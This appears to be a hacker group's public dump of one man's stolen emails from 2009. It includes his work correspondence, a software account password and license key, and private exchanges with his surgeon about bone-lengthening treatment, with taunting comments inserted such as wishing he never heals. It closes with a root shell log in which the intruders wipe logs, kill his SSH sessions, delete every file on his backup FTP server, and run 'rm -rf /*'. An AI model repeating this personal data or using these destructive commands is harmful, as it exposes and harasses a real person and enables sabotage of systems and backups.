Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs495425faq; Fri, 29 May 2009 01:49:25 -0700 (PDT) Received: by 10.210.44.12 with SMTP id r12mr2142226ebr.41.1243586965450; Fri, 29 May 2009 01:49:25 -0700 (PDT) Return-Path: Received: from mail.altiscy.com (81-156-25.static.cytanet.com.cy [81.4.156.25]) by mx.google.com with ESMTP id 7si2111376eyg.47.2009.05.29.01.49.22; Fri, 29 May 2009 01:49:25 -0700 (PDT) Received-SPF: neutral (google.com: 81.4.156.25 is neither permitted nor denied by best guess record for domain of louis.loizou@altiscy.com) client-ip=81.4.156.25; Authentication-Results: mx.google.com; spf=neutral (google.com: 81.4.156.25 is neither permitted nor denied by best guess record for domain of louis.loizou@altiscy.com) smtp.mail=louis.loizou@altiscy.com Received: from louisnb ( [217.175.219.197]) by mail.altiscy.com with SMTP (MailFountain 1.5.8.20) (envelope-from rDNS=ok) for polis.yiannoudes@uibs.net panagiotis@uibs.net glafkos@gmail.com anna.charalambous@uibs.net; Fri, 29 May 2009 11:48:50 From: "Altis - Louis Loizou" To: "'Glafkos Charalambous'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> <00d601c9e037$e94228a0$bbc679e0$@com> In-Reply-To: <00d601c9e037$e94228a0$bbc679e0$@com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 11:48:56 +0300 Message-ID: <007801c9e03a$4e7623a0$eb626ae0$@loizou@altiscy.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0079_01C9E053.73C35BA0" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYAAAMiHMAAAPugQ Content-Language: en-gb This is a multi-part message in MIME format. 
------=_NextPart_000_0079_01C9E053.73C35BA0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Hi Glafko, Both network cards are connected, one is connected on the internal network (switch) and the other card is connected on Otenet's modem. I believe the possible reasons we have this problem are: a) The cables of the network cards are connected reverse. b) We entered wrong IPs on the network card. If you have remote access please check this option. Regards Louis ############################################################################ Return-Path: Received: from UiBSSupport ([91.184.220.239]) by mx.google.com with ESMTPS id 7sm2168875eyb.55.2009.05.29.02.26.23 (version=SSLv3 cipher=RC4-MD5); Fri, 29 May 2009 02:26:24 -0700 (PDT) From: "Glafkos Charalambous" To: "'Altis - Louis Loizou'" , "'Polykarpos Yiannoudes'" , "'Panagiotis Charalambous'" Cc: "'Anna Charalambous'" References: <00cb01c9e033$315f4190$941dc4b0$@com> <007001c9e034$afc36830$0f4a3890$@loizou@altiscy.com> <00d601c9e037$e94228a0$bbc679e0$@com> <007801c9e03a$4e7623a0$eb626ae0$@loizou@altiscy.com> In-Reply-To: <007801c9e03a$4e7623a0$eb626ae0$@loizou@altiscy.com> Subject: RE: http://support.uibs.net/ and Staging Date: Fri, 29 May 2009 12:25:37 +0300 Message-ID: <00de01c9e03f$6ebc5e90$4c351bb0$@com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00DF_01C9E058.94099690" X-Mailer: Microsoft Office Outlook 12.0 Thread-Index: AcngI93cEBf8ABFmScmlKvFsZmHlQgADoLhQAAB9LYAAAMiHMAAAPugQAAFzekA= Content-Language: en-us This is a multi-part message in MIME format. ------=_NextPart_000_00DF_01C9E058.94099690 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit Hi Louis, I checked everything remotely before. 1. There is no problem with the IPs entered as I had double check them. 2. 
If the cables were connected in reverse it shouldn't matter as we are getting both internal IPs and we should have got at least one internal and one external with 169. IP range as it is set to dynamic. 3. Three machines on the network Anna, Elena and Kate are not receiving an IP Address on the network also. We need access on the server room to check network cables. It makes sense that we need only one cable from Otenet modem to HP_DL380A second card and the staging issue will be solved (maybe there is a mis configuration on the cables between CISCO, Otenet and the Switch I can't verify) Concerning the 3 machines that do not have network access I believe a cable must be disconnected and I cannot confirm as I can't see the server room. Regards, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs442850faq; Thu, 28 May 2009 09:17:58 -0700 (PDT) Received: by 10.210.143.11 with SMTP id q11mr886187ebd.66.1243527477686; Thu, 28 May 2009 09:17:57 -0700 (PDT) Return-Path: Received: from alboreto.otenet-telecom.net (alboreto.otenet-telecom.net [213.207.140.122]) by mx.google.com with ESMTP id 7si260241ewy.34.2009.05.28.09.17.56; Thu, 28 May 2009 09:17:57 -0700 (PDT) Received-SPF: neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of polis.yiannoudes@uibs.net) client-ip=213.207.140.122; Authentication-Results: mx.google.com; spf=neutral (google.com: 213.207.140.122 is neither permitted nor denied by best guess record for domain of polis.yiannoudes@uibs.net) smtp.mail=polis.yiannoudes@uibs.net Received: from localhost (localhost [127.0.0.1]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 989BC56E0 for ; Thu, 28 May 2009 19:17:54 +0300 (EEST) X-Virus-Scanned: Debian amavisd-new at alboreto.otenet-telecom.net Received: from alboreto.otenet-telecom.net ([127.0.0.1]) by localhost (alboreto.otenet-telecom.net 
[127.0.0.1]) (amavisd-new, port 10024) with ESMTP id R80EE6aJo98R for ; Thu, 28 May 2009 19:17:48 +0300 (EEST) Received: from mail.uibs.net (unknown [213.207.156.52]) by alboreto.otenet-telecom.net (Postfix) with ESMTP id 3E78356EA for ; Thu, 28 May 2009 19:17:48 +0300 (EEST) Received: from ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171]) by ERMIS.uibs.local ([fe80::2ddf:ce8e:ab88:171%19]) with mapi; Thu, 28 May 2009 19:17:00 +0300 From: Polykarpos Yiannoudes To: Glafkos Charalambous , Glafkos Charalambous Date: Thu, 28 May 2009 19:16:57 +0300 Subject: Plan Thread-Topic: Plan Thread-Index: Acnfr7lXWUtFse1QStC8/q3uOpnlDQ== Message-ID: Accept-Language: en-US, en-GB Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: acceptlanguage: en-US, en-GB Content-Type: multipart/alternative; boundary="_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9F93ERMISuibsloca_" MIME-Version: 1.0 --_000_A839B4C22E5430408D1B9C0B96C216CC94D3CF9F93ERMISuibsloca_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Dear Glafko, Thank you fro you help today! Please submit your Server maintenance plan for UiBS. There is a lot maintenance behind, error s in most servers logs, review of= SCE etc..I don't think is anyone using it etc. Looking forward to your feedback on how we proceed. Please turn on the mobi= le number And also send me a document map of our network. Kind regards, P. 
############################################################################ MIME-Version: 1.0 Received: by 10.223.115.70 with HTTP; Thu, 28 May 2009 12:58:11 -0700 (PDT) In-Reply-To: References: Date: Thu, 28 May 2009 22:58:11 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905281258m139c82d5r57cd1a5c2eb79c60@mail.gmail.com> Subject: Re: Plan From: Glafkos Charalambous To: Polykarpos Yiannoudes Content-Type: multipart/alternative; boundary=0016368e2bd635c388046afe61b2 --0016368e2bd635c388046afe61b2 Content-Type: text/plain; charset=windows-1252 Content-Transfer-Encoding: quoted-printable Hello Poly, NP for today. I do not do any maintenance on UiBS as I am only working with tickets and i= f some times I see something not alright I fix it. I will create a maintenance plan for UiBS Also I will create a network map for UiBS. Regards Glafkos When do you think will be a good tiem to have a meeting ? When you have tim= e of course I understand that your hours are full because of work. 
############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.115.70 with SMTP id h6cs345144faq; Wed, 27 May 2009 01:09:19 -0700 (PDT) Received: by 10.86.91.13 with SMTP id o13mr7990609fgb.7.1243411759727; Wed, 27 May 2009 01:09:19 -0700 (PDT) Return-Path: Received: from smtpmt01.gfi.com (smtpmt01.gfi.com [78.133.123.219]) by mx.google.com with ESMTP id e11si1822514fga.26.2009.05.27.01.09.19; Wed, 27 May 2009 01:09:19 -0700 (PDT) Received-SPF: pass (google.com: domain of MBriffa@gfi.com designates 78.133.123.219 as permitted sender) client-ip=78.133.123.219; Authentication-Results: mx.google.com; spf=pass (google.com: domain of MBriffa@gfi.com designates 78.133.123.219 as permitted sender) smtp.mail=MBriffa@gfi.com X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.4325 Content-Class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C9DEA2.6FCA9FC1" Subject: NFR Keys Date: Wed, 27 May 2009 10:09:24 +0200 Message-ID: X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: NFR Keys thread-index: AcneonKkClJGt0bFTCaN99DD8QXEBQ== From: "Michelle Briffa" To: CC: "Edward Lansink" This is a multi-part message in MIME format. ------_=_NextPart_001_01C9DEA2.6FCA9FC1 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Dear Sir/Madam, Thank you for your request! You can find the NFR license key you have requested below. CID: 165159 (Marketing ) ITSolutionsKB.com Username: k3oxziwb13okaao=20 Password: di6xo3ibxi6kstz Product: GFI LANguard 9 Number of units: 32 Valid till: 2010-05-27 License key: UHb2szLZ0sSXd-Fhn9UXWyCzY0xC2mftf-P-677171 Should you have any queries please do not hesitate to contact me. 
Kind regards, Michelle Briffa - mbriffa@gfi.com=20 Sales Order Processor - GFI Software - www.gfi.com Web & Mail Security, Archiving & Fax, Networking & Security Tel: +356 22052000 (ext: 2127) Fax: +356 21382419 // Free license key, wohooo. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 8 May 2009 00:29:08 -0700 (PDT) Date: Fri, 8 May 2009 10:29:08 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> Subject: Glafkos Cyprys XRAYS at 4.7 CM From: Glafkos Charalambous To: mitkovic@gmail.com Content-Type: multipart/mixed; boundary=001636c5b90e9376bd0469619563 --001636c5b90e9376bd0469619563 Content-Type: multipart/alternative; boundary=001636c5b90e9376b60469619561 --001636c5b90e9376b60469619561 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Dr, I am sending you my X-RAYS to update me on my status and progress. I am currently having pain on my left leg in the front where the bone is broken and I feel that pain when I stretch that leg. I start having knee bending although I am exercising and some ballerina. I am walking on walker before and after each click so I stretch my legs. I am doing 4 clicks per day since the start of lengthening and last month I am doing also some 3 clicks and some days off. I think I have missalignment based on XRAYS on my right leg. 
Regards Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs9458faq; Fri, 8 May 2009 10:34:07 -0700 (PDT) MIME-Version: 1.0 Received: by 10.223.115.12 with SMTP id g12mr2251770faq.92.1241804047120; Fri, 08 May 2009 10:34:07 -0700 (PDT) In-Reply-To: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> References: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> Date: Fri, 8 May 2009 19:34:07 +0200 Message-ID: Subject: Re: Glafkos Cyprys XRAYS at 4.7 CM From: Milorad Mitkovic To: Glafkos Charalambous Content-Type: multipart/alternative; boundary=001636c5b3511bfa6d04696a09d7 --001636c5b3511bfa6d04696a09d7 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Dear Mr. Glafkos, There is good healing on x-rays. There is no misalignment. Everything is still in normal borders. However, there is visible bars bending (more left) which is firs sign that ballerina foot wants to be developed as well as some knee bending. Where do you have pain? Is it on pin areas or just on breaking area below the pins as you mentioned. If braking area the best think is to stop lengthening several days and resume with 3 surfaces. Best regards Dr. Mitkovic ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 8 May 2009 10:46:10 -0700 (PDT) In-Reply-To: References: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> Date: Fri, 8 May 2009 20:46:10 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905081046q3240d6baua467a67cd811104c@mail.gmail.com> Subject: Re: Glafkos Cyprys XRAYS at 4.7 CM From: Glafkos Charalambous To: Milorad Mitkovic Content-Type: multipart/alternative; boundary=001636c5b588354edb04696a3403 --001636c5b588354edb04696a3403 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello Dr. 
Thank you for the updates. I have problem on my right leg when I straight my legs its very hard but goes away after little exercise. On the left leg I have the pain above the bars where the bone is broke since 2 weeks and 1.5cm ballerina on that leg. Today and tomorrow I will not lengthen. Do you believe going only 3 clicks is better? I really don't have a problem if I have less complications and keep more flexibility. Waiting yours, Glafkos ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs28741faq; Fri, 8 May 2009 14:10:03 -0700 (PDT) MIME-Version: 1.0 Received: by 10.223.123.129 with SMTP id p1mr2507648far.29.1241817002175; Fri, 08 May 2009 14:10:02 -0700 (PDT) In-Reply-To: <4b20eb360905081046q3240d6baua467a67cd811104c@mail.gmail.com> References: <4b20eb360905080029v2fdbe7d0t204174bda616430d@mail.gmail.com> <4b20eb360905081046q3240d6baua467a67cd811104c@mail.gmail.com> Date: Fri, 8 May 2009 23:10:02 +0200 Message-ID: Subject: Re: Glafkos Cyprys XRAYS at 4.7 CM From: Milorad Mitkovic To: Glafkos Charalambous Content-Type: multipart/alternative; boundary=001636c5a9ff4a6bdf04696d0dd1 --001636c5a9ff4a6bdf04696d0dd1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Yes for knee and ankle contracture prevention and treatment exercises are the best. It is good to rest and to do lengthening as slow as possible 2-3 surfaces/day. 
// We at anti-sec, hope you never heal :] ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 02:39:11 -0700 (PDT) Date: Fri, 22 May 2009 12:39:11 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> Subject: Logo Design From: Glafkos Charalambous To: designhome11@gmail.com Content-Type: multipart/alternative; boundary=00163662e5db63c777046a7d08f8 --00163662e5db63c777046a7d08f8 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, I speak with your cousin Design World and I will need a logo for my website http://webhostline.com/_new Can you come up with some revisions/samples? Price told me its $15USD Maybe I will need another 4-5 logos for other projects shortly ############################################################################ Delivered-To: glafkos@gmail.com Received: by 10.223.119.65 with SMTP id y1cs51909faq; Fri, 22 May 2009 05:11:46 -0700 (PDT) MIME-Version: 1.0 Received: by 10.114.170.1 with SMTP id s1mr7855704wae.57.1242994298310; Fri, 22 May 2009 05:11:38 -0700 (PDT) In-Reply-To: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> Date: Fri, 22 May 2009 17:41:38 +0530 Message-ID: <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> Subject: Re: Logo Design From: Designer To: Glafkos Charalambous Content-Type: multipart/mixed; boundary=0016364c716b9bd457046a7f2953 --0016364c716b9bd457046a7f2953 Content-Type: multipart/alternative; boundary=0016364c716b9bd43e046a7f2951 --0016364c716b9bd43e046a7f2951 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit here is the logo attached... let me know if you need any changes... payment via paypal at thedesignideas@gmail.com Thanks. 
############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 05:15:53 -0700 (PDT) In-Reply-To: <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> Date: Fri, 22 May 2009 15:15:53 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220515u4a9bf74do959b5ddb060a7873@mail.gmail.com> Subject: Re: Logo Design From: Glafkos Charalambous To: Designer Content-Type: multipart/alternative; boundary=001636c5ac93d4e08f046a7f38ef --001636c5ac93d4e08f046a7f38ef Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello mate.. I need something glossy with a logo and not only text. Something to match also the website in a nice and professional way. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Fri, 22 May 2009 05:48:16 -0700 (PDT) In-Reply-To: <3d5db02e0905220539p401ea914n29001d179887af5f@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> <3d5db02e0905220511o60ffbcd7pb2f66a81c113de66@mail.gmail.com> <4b20eb360905220515u4a9bf74do959b5ddb060a7873@mail.gmail.com> <3d5db02e0905220524w7ab34e1cr7717651baff182df@mail.gmail.com> <3d5db02e0905220539p401ea914n29001d179887af5f@mail.gmail.com> Date: Fri, 22 May 2009 15:48:16 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905220548w3105581es4752c68e54c2b476@mail.gmail.com> Subject: Re: Logo Design From: Glafkos Charalambous To: Designer Content-Type: multipart/alternative; boundary=001636c5a965a84196046a7face1 --001636c5a965a84196046a7face1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello mate, I need a good logo please something that has to do with the name of the domain and what it offers. 
I can draw also some logos with text and a graphic. I need something extreme please // Extreme is what you will get sir. wait till we hit the rm -rf / ;p ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Sat, 23 May 2009 02:57:12 -0700 (PDT) In-Reply-To: <3d5db02e0905222217x37c7de26s1c61bcb2605fefb2@mail.gmail.com> References: <4b20eb360905220239td207f7br84161e220a98a5a9@mail.gmail.com> <3d5db02e0905220805m6dd27789i3878980e5ea8187d@mail.gmail.com> <4b20eb360905220807g2d56ec1apb4dc524e96a1bc55@mail.gmail.com> <3d5db02e0905220811m7d63a444w47911815ac7d4fa8@mail.gmail.com> <4b20eb360905220816o79304495v5b5f33ded1460edc@mail.gmail.com> <3d5db02e0905220818t2e7e618y52edd477a39f5a61@mail.gmail.com> <4b20eb360905220839r3352bb8dq75721458a7e4c267@mail.gmail.com> <3d5db02e0905220847q2640dedas7e775cf2a362b285@mail.gmail.com> <4b20eb360905221129o4338f92es8008dec0f170c00a@mail.gmail.com> <3d5db02e0905222217x37c7de26s1c61bcb2605fefb2@mail.gmail.com> Date: Sat, 23 May 2009 12:57:12 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905230257v72e85df4r16c4ff5c1e894ae4@mail.gmail.com> Subject: Re: Logo Design From: Glafkos Charalambous To: Designer Content-Type: multipart/alternative; boundary=001636c599ffb43cc2046a9166c6 --001636c599ffb43cc2046a9166c6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello mate, Payment has been sent. Please do not disclose the LOGO anywhere on the net. 
Many Thanks, Glafkos // We would like to disclose your logos all over the net, link : http://rapidshare.com/files/242546059/logos.tar.html ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Sat, 9 May 2009 11:24:42 -0700 (PDT) Date: Sat, 9 May 2009 21:24:42 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905091124p4e821fbal1296aa4ec902901f@mail.gmail.com> Subject: Master on Information Security From: Glafkos Charalambous To: infosec@cs.jmu.edu Content-Type: multipart/mixed; boundary=0016368e30cce6971804697edb54 --0016368e30cce6971804697edb54 Content-Type: multipart/alternative; boundary=0016368e30cce6971304697edb52 --0016368e30cce6971304697edb52 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, I am interested for an online master degree on information security. Could you please provide me with master degree total price I will need to pay if I take the degree? Kindly Regards, Glafkos Charalambous // Haha. Lesson #1: Learn to secure your own belongings. ############################################################################ MIME-Version: 1.0 Received: by 10.223.119.65 with HTTP; Wed, 6 May 2009 06:29:57 -0700 (PDT) Date: Wed, 6 May 2009 16:29:57 +0300 Delivered-To: glafkos@gmail.com Message-ID: <4b20eb360905060629w559a79b2pd3e409acb983e326@mail.gmail.com> Subject: Freelancer seeking for job From: Glafkos Charalambous To: support@debliteck.com Content-Type: multipart/mixed; boundary=0016368e310f37651104693e6472 --0016368e310f37651104693e6472 Content-Type: multipart/alternative; boundary=0016368e310f37650c04693e6470 --0016368e310f37650c04693e6470 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Hello, I am a freelancer and I would like to work remotely on various web development projects. I am attaching you my CV for your reference. 
Regards, Charalambous Glafkos MCITP:Enterprise Admin, MCTS, CCNA, CHFI, CEH, ECSA, LPT, OCSP IT Solutions Knowledge Base - http://www.itsolutionskb.com ############################################################################ MIME-Version: 1.0 Sender: glafkos@gmail.com Received: by 10.223.119.65 with HTTP; Tue, 5 May 2009 03:19:10 -0700 (PDT) Date: Tue, 5 May 2009 13:19:10 +0300 Delivered-To: glafkos@gmail.com X-Google-Sender-Auth: afe880e2c71dda81 Message-ID: <4b20eb360905050319x3468b2adi5493b8b3546f86d4@mail.gmail.com> Subject: MyCV From: Glafkos Charalambous To: jobs@diktiagora.com Content-Type: multipart/mixed; boundary=0016e6d3853b1803ab0469279c27 --0016e6d3853b1803ab0469279c27 Content-Type: multipart/alternative; boundary=0016e6d3853b1803a50469279c25 --0016e6d3853b1803a50469279c25 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Dear, Based on your website vacancies for Application Developer I am attaching you my CV. Kindly Regards, Charalambous Glafkos ############################################################################ // Now to the best part, the rm -rf. sh-3.1# rm -rf /var/log/ sh-3.1# pwd /root sh-3.1# rm -rf * sh-3.1# who infosec pts/2 2009-06-09 05:57 (91.184.220.239) itkb pts/3 2009-06-09 05:57 (91.184.220.239) sh-3.1# ps aux | grep sshd root 1868 0.0 0.0 7288 1672 ? Ss Jun08 0:00 /usr/sbin/sshd root 12795 0.0 0.1 9872 3268 ? Ss 04:15 0:00 sshd: infosec [priv] infosec 12798 0.0 0.1 10456 2544 ? S 04:15 0:01 sshd: root 22034 0.0 0.1 9872 3332 ? Ss 05:56 0:00 sshd: infosec [priv] infosec 22036 0.0 0.1 9872 2192 ? S 05:57 0:00 sshd: infosec@pts/2 root 22069 0.0 0.1 9936 3324 ? Ss 05:57 0:00 sshd: itkb [priv] itkb 22151 0.0 0.1 9936 2184 ? S 05:57 0:00 sshd: itkb@pts/3 root 25084 0.0 0.0 7876 1432 pts/1 S+ 06:25 0:00 grep sshd sh-3.1# kill -9 22151 sh-3.1# kill -9 22036 sh-3.1# who sh-3.1# service sshd stop Stopping sshd: [ OK ] sh-3.1# ftp nowayout.myftp.org Connected to nowayout.myftp.org. 
220 Microsoft FTP Service 504 Security mechanism not implemented. 504 Security mechanism not implemented. KERBEROS_V4 rejected as an authentication type Name (nowayout.myftp.org:infosec): backup 331 Password required for backup. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls -la 227 Entering Passive Mode (91,184,220,239,194,133). 125 Data connection already open; Transfer starting. 11-04-08 10:48AM 00-00-2007 05-01-09 07:21AM 01-05-2009 06-01-09 07:22AM 01-06-2009 02-02-09 08:27AM 02-02-2009 05-02-09 01:18PM 02-05-2009 06-02-09 07:21AM 02-06-2009 02-03-09 08:20AM 03-02-2009 06-03-09 07:09AM 03-06-2009 06-04-09 07:23AM 04-06-2009 06-05-09 07:10AM 05-06-2009 06-06-09 07:18AM 06-06-2009 06-07-09 07:19AM 07-06-2009 06-08-09 07:20AM 08-06-2009 05-09-09 08:29PM 09-05-2009 06-09-09 07:20AM 09-06-2009 05-10-09 10:38AM 10-05-2009 05-11-09 07:21AM 11-05-2009 05-12-09 07:19AM 12-05-2009 05-13-09 07:19AM 13-05-2009 05-14-09 07:18AM 14-05-2009 05-15-09 07:18AM 15-05-2009 05-16-09 07:20AM 16-05-2009 05-17-09 07:19AM 17-05-2009 05-18-09 07:19AM 18-05-2009 03-19-09 01:07PM 19-03-2009 05-19-09 07:21AM 19-05-2009 03-20-09 07:23AM 20-03-2009 05-20-09 07:20AM 20-05-2009 05-21-09 07:18AM 21-05-2009 05-22-09 07:20AM 22-05-2009 05-23-09 07:21AM 23-05-2009 05-24-09 07:21AM 24-05-2009 05-25-09 07:21AM 25-05-2009 05-26-09 07:21AM 26-05-2009 05-27-09 07:26AM 27-05-2009 04-28-09 07:21AM 28-04-2009 05-28-09 07:21AM 28-05-2009 01-29-09 08:20AM 29-01-2009 04-29-09 07:21AM 29-04-2009 05-29-09 07:09AM 29-05-2009 03-30-09 07:27AM 30-03-2009 04-30-09 07:24AM 30-04-2009 05-30-09 07:21AM 30-05-2009 01-31-09 08:27AM 31-01-2009 03-31-09 03:56PM 31-03-2009 05-31-09 07:20AM 31-05-2009 11-04-08 10:50AM Backup Scripts 04-17-09 10:40PM BT4_ 06-09-09 01:04PM christine 01-04-09 05:01PM 39192 OS-3588-exam.tgz.bz2 04-07-09 07:26AM OSCPFinalLab 11-14-08 02:58AM 872364 wordpress.2008-11-13.xml 226 Transfer complete. ftp> mdelete * // oops. 
sh-3.1# cd ~infosec
sh-3.1# rm -rf *
sh-3.1# ls -la
total 12
drwx--x--x 2 infosec infosec 4096 Jun 9 06:35 .
drwxr-xr-x 43 root root 4096 Jun 9 00:20 ..
sh-3.1# cd ~ryb
sh-3.1# rm -rf *
sh-3.1# rm -rf /* &
[1] 26243

We found our way in, will he find his way out of this mess?